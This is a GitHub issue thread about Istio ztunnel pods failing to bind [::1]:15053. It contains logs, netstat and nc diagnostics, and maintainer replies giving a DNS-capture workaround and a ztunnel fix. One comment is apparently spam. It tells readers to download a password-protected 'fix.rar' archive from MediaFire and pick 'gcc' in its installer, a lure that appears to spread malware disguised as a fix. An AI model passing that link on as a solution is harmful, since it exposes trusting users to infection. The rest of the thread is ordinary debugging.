### ISSUE TITLE
Ztunnel pod: failed to bind to address 15053

### ISSUE THREAD

**Issue by kovaxur** [istio/istio#52858]
### Is this the right place to submit this?

- [X] This is not a security vulnerability or a crashing bug
- [X] This is not a question about how to use Istio

### Bug Description

Hi,
We had a strange issue, where the Istio gateway reported `upstream connect error or disconnect/reset before headers. reset reason: connection termination` randomly sometimes for certain endpoints. I went into the http1.1/2/timeout rabbit hole but then I realized, that the pods, where we get this error are not reachable from the gateway at all, when I try to manually curl to the pod, I just get a connection refused error for both 15008 and 8080 (app port).

Then I realized, that the ztunnel pod on a node of the cluster is in "not ready" state and logs the following error:

```
2024-08-26T16:58:16.711297Z    info    dns::server    starting local DNS server    address=localhost:15053 component="dns"                                                                
2024-08-26T16:58:16.711448Z    info    inpod::statemanager    retrying workload failed: failed to bind to address [::1]:15053: Cannot assign requested address (os error 99)    uid="c9df3bc2-8943-4f2d-8441-9beb07aa0a04"
```
container name: istio-proxy
container image: gcr.io/istio-testing/ztunnel:1.24-alpha.d334295f1866d584af78164ad99e86bedd44a6ac-distroless

The container is stuck in ready=false state, has 0 restarts.

```
ztunnel-x4kkj:/root$ netstat
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       
tcp        0      0 ztunnel-x4kkj:41944     istiod.istio-system.svc.cluster.local:15012 ESTABLISHED 
tcp        0      0 ztunnel-x4kkj:15021     10-201-0-26.kubelet.default.svc.cluster.local:41562 TIME_WAIT   
tcp        0      0 ztunnel-x4kkj:15020     grafana-agent-metrics-0.grafana-XXXXX.svc.cluster.local:52036 ESTABLISHED 
tcp        0      0 ztunnel-x4kkj:15021     10-201-0-26.kubelet.default.svc.cluster.local:47706 TIME_WAIT   
tcp        0      0 ztunnel-x4kkj:15021     10-201-0-26.kubelet.default.svc.cluster.local:34532 TIME_WAIT   
tcp        0      0 ztunnel-x4kkj:15021     10-201-0-26.kubelet.default.svc.cluster.local:43054 TIME_WAIT   
tcp        0      0 ztunnel-x4kkj:15021     10-201-0-26.kubelet.default.svc.cluster.local:44438 TIME_WAIT   
tcp        0      0 ztunnel-x4kkj:15021     10-201-0-26.kubelet.default.svc.cluster.local:40054 TIME_WAIT   
tcp        0      0 ztunnel-x4kkj:15021     10-201-0-26.kubelet.default.svc.cluster.local:49342 TIME_WAIT   
tcp        0      0 ztunnel-x4kkj:15021     10-201-0-26.kubelet.default.svc.cluster.local:34520 TIME_WAIT   
tcp        0      0 ztunnel-x4kkj:15021     10-201-0-26.kubelet.default.svc.cluster.local:43056 TIME_WAIT   
Active UNIX domain sockets (w/o servers)
Proto RefCnt Flags       Type       State         I-Node Path
unix  3      [ ]         SEQPACKET  CONNECTED      32937 /var/run/ztunnel/ztunnel.sock
unix  3      [ ]         SEQPACKET  CONNECTED      32936 
unix  3      [ ]         STREAM     CONNECTED      32909 
unix  3      [ ]         STREAM     CONNECTED      32908 
```

```
ztunnel-x4kkj:/root$ netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:15000         0.0.0.0:*               LISTEN      -
tcp        0      0 ::1:15000               :::*                    LISTEN      -
tcp        0      0 :::15020                :::*                    LISTEN      -
tcp        0      0 :::15021                :::*                    LISTEN      -
```

```
ztunnel-x4kkj:/root$ netstat -unlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
```

```
ztunnel-x4kkj:/root$ lsof -i :15053
1	/bin/bash	0	/dev/pts/0
1	/bin/bash	1	/dev/pts/0
1	/bin/bash	2	/dev/pts/0
1	/bin/bash	255	/dev/pts/0

```

Trying to bind to port 15020 -> fails but it's ok, trying to bind to 15053 works without issue
```
ztunnel-x4kkj:/root$ nc -l 15020
nc: Address in use
ztunnel-x4kkj:/root$ nc -u -l 15053



^C
```

I'm using the alpha version due to https://github.com/istio/istio/issues/52260. Can this be related?

### Version

```Text
Istio:
client version: 1.22.1
control plane version: 1.24-alpha.d334295f1866d584af78164ad99e86bedd44a6ac
data plane version: 1.23.0 (3 proxies), 1.24-alpha.d334295f1866d584af78164ad99e86bedd44a6ac (52 proxies)

Kubernetes:
Client Version: v1.29.0
Kustomize Version: v5.0.4-0.20230601165947-6ce0bf390ce3
Server Version: v1.29.6-eks-db838b0
```

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by howardjohn** [comment]
Is there any chance you can run those same commands in the pod network namespace? and additional `ip addr`?

In the meantime, `defaults.meshConfig.defaultConfig.proxyMetadata.ISTIO_META_DNS_CAPTURE` is a known workaround to this problem. We are investigating in https://github.com/istio/ztunnel/issues/1272. Right now, we have many users report it, but have been unable to get our hands on the debugging info we need to solve it (or a reproduction)

**Comment by howardjohn** [comment]
We **really** need the information (`netstat -ntlp; netstat -nlup; ip addr; ip link` from inside the failing pod network namespace (not ztunnel) to make progress here. We have had many users report this but no one provide this information, so we cannot do anything to solve it really.

I would be happy to even jump on a video call to walk someone through it. Please feel free to ping me on slack if you have this issue and are willing to troubleshoot.

---

>  Unfortunately the workaround (ISTIO_META_DNS_CAPTURE=false) causes DNS resolution failures:

Make sure you don't have `values.cni.ambient.dnsCapture=true` set (which will cause the redirection to the dns server you just disabled).

**Comment by joke** [comment]
@howardjohn contacted you via slack

**Comment by howardjohn** [comment]
Thank you @joke and @bleggett for your help on slack, we have a fix ready in https://github.com/istio/ztunnel/pull/1284. I was able to reproduce the issue both in a unit test and a live cluster, and the fix resolves the issue in both of these.

One word of warning is the fix is to make it so the retry of the failure succeeds. You may still see the error message, but it should resolve itself (the bug was that it never resolves).

I've slotted the fix to be cherrypicked to 1.23, so we should get this in for the upcoming 1.23.1 release.

As others have noted, one workaround for this problem in the meantime is to restart ztunnel _or_ the istio-cni pod.

**Comment by karan56625** [comment]
I am seeing this issue on 1.28 as well. 
`2026-01-07T17:51:33.579503Z error inpod::workloadmanager failed to start proxy: Bind([::1]:15053, Os { code: 99, kind: AddrNotAvailable, message: "Cannot assign requested address" }) uid=2a6140db-b27a-4f11-a7ff-58643b6ce31f`
